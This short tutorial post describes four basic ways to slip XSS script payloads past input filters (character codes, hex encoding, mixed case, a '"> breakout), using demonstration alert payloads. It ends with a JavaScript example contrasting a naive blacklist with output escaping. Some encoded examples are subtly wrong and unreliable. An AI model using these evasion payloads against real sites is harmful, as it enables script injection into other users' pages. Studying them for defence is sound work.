Four very basic bypass methods.
1. Convert to ASCII codes
Example: the original script is <script>alert(‘I love F4ck’)</script >
After conversion, it becomes:
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>

2. Convert to HEX (hexadecimal)
Example: the original script is <script>alert(‘I love F4ck’)</script>
After conversion, it becomes:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
3. Change the letter case of the script
Example: the original script is <script>alert(‘I love F4ck’)</script>
Converted to: <ScRipt>AleRt(‘I love F4ck’)</sCRipT>
4. Add the closing marker ”>
Example: the original script is <script>alert(‘I love F4ck’)</script>
Converted to: ”><script>alert(‘I love F4ck’)</script>
For more detailed bypass techniques, see this page:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

The conversion tool used is HackBar, a Mozilla Firefox add-on.
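
The four forms above all work against filters that match a literal string, so here is an added example (not part of the original post) that compares such a blacklist with escaping at output time. The names naiveFilter, escapeHtml and renderInput are hypothetical, and the samples are constructed with a harmless alert(1) payload.

```javascript
// Added illustration; naiveFilter, escapeHtml and renderInput are hypothetical names.

// Constructed samples in the four forms listed in the post, with a harmless payload.
const samples = {
  charCodes: '<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</script>',
  urlHex:    '%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e',
  mixedCase: '<ScRipt>AleRt(1)</sCRipT>',
  breakout:  '"><script>alert(1)</script>',
};

// Blacklist of the kind these tricks target: a literal, case-sensitive match on raw input.
// Returns true when the input is accepted.
function naiveFilter(raw) {
  return !raw.includes('<script>');
}

// Escape the five characters that are significant in HTML text and quoted attributes.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Decode once, as a web framework does for query parameters, then escape at the point
// of output. The form of the value no longer matters: it can only be attribute text.
function renderInput(raw) {
  const value = decodeURIComponent(raw);
  return '<input value="' + escapeHtml(value) + '">';
}

// Summarise both approaches for every sample.
function report() {
  return Object.entries(samples).map(([name, raw]) => ({
    name,
    acceptedByBlacklist: naiveFilter(raw),
    rendered: renderInput(raw),
  }));
}

console.table(report());
```

The blacklist accepts the mixed-case and URL-encoded samples unchanged, while the escaped output for all four contains no raw `<`, `>` or `"` inside the attribute value.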